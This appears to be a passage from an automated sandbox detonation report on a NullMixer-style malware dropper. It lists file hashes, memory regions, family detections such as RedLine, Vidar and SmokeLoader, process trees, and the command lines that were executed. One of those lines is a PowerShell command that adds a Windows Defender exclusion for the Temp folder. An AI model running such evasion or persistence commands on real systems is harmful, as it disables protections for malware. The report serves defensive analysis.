SHA256 5bc06297cbc3f94d9794721ef91fa737da870c7a822efd5e603516153074fbb3
SHA512 a98e69b463a6a8cfd71cd1767c037ae337feab8aec30b615b8f35adc4347d32230147097fa3204600c1d66d3b2f8e99f9716fc263bb7af048153828d048bf919

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat204ab24d039a58be8.exe

MD5 f79878c5bb37eaf44b6632dfdf5207a0
SHA1 175d67306e3c8795da5d7a6bed638ed071dd3cbb
SHA256 5bc06297cbc3f94d9794721ef91fa737da870c7a822efd5e603516153074fbb3
SHA512 a98e69b463a6a8cfd71cd1767c037ae337feab8aec30b615b8f35adc4347d32230147097fa3204600c1d66d3b2f8e99f9716fc263bb7af048153828d048bf919

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat204ab24d039a58be8.exe

MD5 f79878c5bb37eaf44b6632dfdf5207a0
SHA1 175d67306e3c8795da5d7a6bed638ed071dd3cbb
SHA256 5bc06297cbc3f94d9794721ef91fa737da870c7a822efd5e603516153074fbb3
SHA512 a98e69b463a6a8cfd71cd1767c037ae337feab8aec30b615b8f35adc4347d32230147097fa3204600c1d66d3b2f8e99f9716fc263bb7af048153828d048bf919

\Users\Admin\AppData\Local\Temp\is-23SB5.tmp\Sat20474d8e68c3f86b.tmp

MD5 090544331456bfb5de954f30519826f0
SHA1 8d0e1fa2d96e593f7f4318fa9e355c852b5b1fd4
SHA256 b32cbc6b83581d4dc39aa7106e983e693c5df0e0a28f146f0a37bc0c23442047
SHA512 03d5cbc044da526c8b6269a9122437b8d386530900e2b8452e4cf7b3d36fc895696cbe665e650a9afbdec4bad64a3dc0f6f5e1309e07f6f1407ec0643cac121d

memory/584-158-0x0000000000000000-mapping.dmp

memory/1204-159-0x0000000000400000-0x000000000046D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-23SB5.tmp\Sat20474d8e68c3f86b.tmp

MD5 090544331456bfb5de954f30519826f0
SHA1 8d0e1fa2d96e593f7f4318fa9e355c852b5b1fd4
SHA256 b32cbc6b83581d4dc39aa7106e983e693c5df0e0a28f146f0a37bc0c23442047
SHA512 03d5cbc044da526c8b6269a9122437b8d386530900e2b8452e4cf7b3d36fc895696cbe665e650a9afbdec4bad64a3dc0f6f5e1309e07f6f1407ec0643cac121d

memory/1312-162-0x0000000001060000-0x000000000108E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-23SB5.tmp\Sat20474d8e68c3f86b.tmp

MD5 090544331456bfb5de954f30519826f0
SHA1 8d0e1fa2d96e593f7f4318fa9e355c852b5b1fd4
SHA256 b32cbc6b83581d4dc39aa7106e983e693c5df0e0a28f146f0a37bc0c23442047
SHA512 03d5cbc044da526c8b6269a9122437b8d386530900e2b8452e4cf7b3d36fc895696cbe665e650a9afbdec4bad64a3dc0f6f5e1309e07f6f1407ec0643cac121d

\Users\Admin\AppData\Local\Temp\is-LQ3GF.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-LQ3GF.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-LQ3GF.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

memory/1772-167-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe

MD5 4b37248b884a6da97515dbb65f0c6c09
SHA1 e4102a6c1296d0cc14379a5573938999ab4dcdbe
SHA256 b46346a80b171843820385f916b716efaa3451aea46ae8857739af6da256f2ce
SHA512 1ff5b21e9739b2b18ecbabc8def2118ff1bcb58589d39a100ac3c9a64c462d40f9f4335c3c143f6ab9e9ef5f0c83e0d66a20a7a724e48dc869829971f986b41d

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe

MD5 4b37248b884a6da97515dbb65f0c6c09
SHA1 e4102a6c1296d0cc14379a5573938999ab4dcdbe
SHA256 b46346a80b171843820385f916b716efaa3451aea46ae8857739af6da256f2ce
SHA512 1ff5b21e9739b2b18ecbabc8def2118ff1bcb58589d39a100ac3c9a64c462d40f9f4335c3c143f6ab9e9ef5f0c83e0d66a20a7a724e48dc869829971f986b41d

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe

MD5 4b37248b884a6da97515dbb65f0c6c09
SHA1 e4102a6c1296d0cc14379a5573938999ab4dcdbe
SHA256 b46346a80b171843820385f916b716efaa3451aea46ae8857739af6da256f2ce
SHA512 1ff5b21e9739b2b18ecbabc8def2118ff1bcb58589d39a100ac3c9a64c462d40f9f4335c3c143f6ab9e9ef5f0c83e0d66a20a7a724e48dc869829971f986b41d

memory/1760-171-0x0000000072650000-0x0000000072BFB000-memory.dmp

memory/2028-172-0x0000000000B80000-0x0000000000CC2000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe

MD5 4b37248b884a6da97515dbb65f0c6c09
SHA1 e4102a6c1296d0cc14379a5573938999ab4dcdbe
SHA256 b46346a80b171843820385f916b716efaa3451aea46ae8857739af6da256f2ce
SHA512 1ff5b21e9739b2b18ecbabc8def2118ff1bcb58589d39a100ac3c9a64c462d40f9f4335c3c143f6ab9e9ef5f0c83e0d66a20a7a724e48dc869829971f986b41d

memory/1312-174-0x00000000002D0000-0x00000000002F0000-memory.dmp

memory/1204-175-0x0000000000400000-0x000000000046D000-memory.dmp

memory/548-176-0x0000000003C70000-0x0000000003EC4000-memory.dmp

memory/524-177-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1760-179-0x0000000072650000-0x0000000072BFB000-memory.dmp

memory/548-178-0x0000000003C70000-0x0000000003EC4000-memory.dmp

memory/484-181-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

memory/484-183-0x000000013F380000-0x000000013F390000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

memory/1760-184-0x0000000072650000-0x0000000072BFB000-memory.dmp

memory/1572-185-0x0000000000000000-mapping.dmp

memory/484-186-0x0000000000660000-0x000000000066E000-memory.dmp

memory/388-188-0x0000000000000000-mapping.dmp

memory/484-187-0x000007FEFB531000-0x000007FEFB533000-memory.dmp

memory/704-189-0x0000000000000000-mapping.dmp

memory/1452-190-0x0000000000000000-mapping.dmp

memory/1452-191-0x000000013FD70000-0x000000013FD80000-memory.dmp

memory/1448-193-0x0000000000000000-mapping.dmp

memory/784-195-0x0000000000000000-mapping.dmp

memory/1160-196-0x000000013F680000-0x000000013F686000-memory.dmp

memory/1160-194-0x0000000000000000-mapping.dmp

memory/1100-197-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-198-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-200-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-202-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-204-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-206-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-207-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-208-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-210-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-212-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-214-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-213-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-217-0x000000014030F3F8-mapping.dmp

memory/1100-216-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-220-0x00000000000E0000-0x0000000000100000-memory.dmp

memory/1100-219-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-221-0x0000000140000000-0x0000000140786000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-10 09:49

Reported

2023-01-10 09:52

Platform

win10v2004-20221111-en

Max time kernel

7s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Smokeloader packer

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

NullMixer

dropper nullmixer

NyMaim

trojan nymaim

OnlyLogger

loader onlylogger

PrivateLoader

loader privateloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Tofsee

trojan tofsee

Vidar

stealer vidar

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\123.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\321.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Shw5TK06iKgZOYTsQkCnwxbv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\hVc81UAyx3ob_zfwfBaFesk3.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\bxmgedut\hbriljmv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\3FrOcX1AbJQcmi5mvBqmmZ83.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20748e484444d9200.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2728 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2728 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2728 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1284 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe
PID 1284 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe
PID 1284 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe
PID 5048 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 804 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20644077cb3868ccd.exe
PID 804 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20644077cb3868ccd.exe
PID 804 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20644077cb3868ccd.exe
PID 452 wrote to memory of 384 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe
PID 452 wrote to memory of 384 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe
PID 452 wrote to memory of 384 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe
PID 2836 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2836 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2836 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 2256 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2027462f7d873c4.exe
PID 4016 wrote to memory of 2256 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2027462f7d873c4.exe
PID 2592 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
PID 2592 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
PID 2592 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
PID 3156 wrote to memory of 808 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20748e484444d9200.exe
PID 3156 wrote to memory of 808 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20748e484444d9200.exe
PID 3708 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20e3fc574eb.exe
PID 3708 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20e3fc574eb.exe
PID 3708 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20e3fc574eb.exe
PID 3500 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe
PID 3500 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe
PID 3500 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe
PID 2408 wrote to memory of 4804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2408 wrote to memory of 4804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2408 wrote to memory of 4804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2224 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe C:\Users\Admin\AppData\Local\Temp\is-K72FH.tmp\Sat20474d8e68c3f86b.tmp
PID 2224 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe C:\Users\Admin\AppData\Local\Temp\is-K72FH.tmp\Sat20474d8e68c3f86b.tmp
PID 2224 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe C:\Users\Admin\AppData\Local\Temp\is-K72FH.tmp\Sat20474d8e68c3f86b.tmp
PID 4804 wrote to memory of 2260 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\bxmgedut\hbriljmv.exe
PID 4804 wrote to memory of 2260 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\bxmgedut\hbriljmv.exe

Processes

C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe

"C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20644077cb3868ccd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat2027462f7d873c4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat2060d0e3bfa5f726.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20049528047bed.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20474d8e68c3f86b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20e3fc574eb.exe

